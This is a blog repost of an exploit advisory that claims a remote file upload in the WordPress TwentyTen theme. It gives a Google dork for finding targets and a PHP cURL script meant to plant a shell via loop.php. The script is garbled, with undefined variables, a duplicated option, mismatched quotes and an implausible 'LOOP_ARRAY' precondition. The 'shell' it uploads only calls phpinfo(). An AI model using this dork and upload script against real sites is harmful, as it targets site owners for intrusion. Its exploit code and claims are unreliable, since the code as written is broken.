WordPress TwentyTen Shell Upload | BOT24

WordPress TwentyTen Shell Upload


##################################################
# Description : Wordpress Themes - TwentyTen Remote File Upload
# Author : Agd_Scorp
# Contact: vorscorp@hotmail.com
# Version : 1.5.x/1.4.x/1.3.x/1.2.x/1.1.x
# Link : http://wordpress.org/extend/themes/twentyten
# Date : Friday, December 28, 2012
# Dork : inurl:/wp-content/themes/twentyten
##################################################

Fact :
this exploit only works if the LOOP_ARRAY functions are enabled in the server, which is disabled by default, although, if the administrator has ever configed the website, the array functions might've been enabled on by default, and cURL must be enabled too.


Exploit :

<?php

$uploadfile="scorp.php.gif";

$ch =
curl_init("http://www.site.com/wordpress/wp-content/themes/twentyten/loop.php");

curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('file[]'=>"@$attachfile"));
curl_setopt($ch, CURLOPT_POSTFIELDS, array('opt[]'=>"@$connector?rate=50&get_file=0?upload="@$attachfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

?>

Shell Access : http://www.site.com/wordpress/wp-content/themes/twentyten/scorp.php.gif
Filename : $postResult output

scorp.php.gif
<?php
phpinfo();
?>
 
   
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
      
Share on Google Plus

About Bradley Susser

    Blogger Comment
    Facebook Comment

0 comments :

Post a Comment